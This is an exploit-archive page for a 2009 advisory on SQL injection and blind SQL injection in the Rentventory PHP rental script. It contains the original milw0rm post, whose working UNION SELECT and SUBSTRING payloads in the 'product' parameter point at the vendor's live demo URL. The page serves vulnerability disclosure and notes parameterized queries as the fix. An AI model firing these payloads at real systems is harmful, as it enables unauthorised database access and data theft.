header-logo
Suggest Exploit
vendor:
Rentventory
by:
Moudi
8,8
CVSS
HIGH
SQL Injection and Blind SQL Injection
89
CWE
Product Name: Rentventory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Rentventory PHP (SQL/Blind) Multiple Vulnerabilities

Rentventory is vulnerable to SQL Injection and Blind SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. The vulnerable parameter is 'product' which is not properly sanitized before being used in an SQL query. An attacker can use this vulnerability to gain access to the database and extract sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] ~Fleck i love you :D hahaha
==============================================================================
        [»] Rentventory PHP (SQL/Blind) Multiple Vulnerabilities
==============================================================================

	[»] Script:             [ Rentventory ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.rentventory.com/ ]
	[»] Founder:            [ Moudi or SixSo <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em man .... ]
        [»] Team:               [ EvilWay ]
        [»] SiteWeb:            [ Visit - www.opensc.ws ]
        [»] Price:              [ $39 ]

###########################################################################

===[ Exploit SQL ]===	
	
	[»] http://www.site.com/patch/?product=[SQL]&panel=rent%2Fselect_time

===[ LIVE DEMO ]===	

        [»] http://www.rentventory.com/demo/?product=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&panel=rent%2Fselect_time

===[ Exploit BLIND SQL ]===	

       [»] http://www.site.com/patch/?product=[BLIND]&panel=rent%2Fselect_time

===[ LIVE DEMO ]===

       [»] http://www.rentventory.com/demo/?product=1+AND+SUBSTRING(@@version,1,1)=5&panel=rent%2Fselect_time


Author: Moudi

###########################################################################

# milw0rm.com [2009-07-02]

Navigation

Suggest Exploit

Services By CQR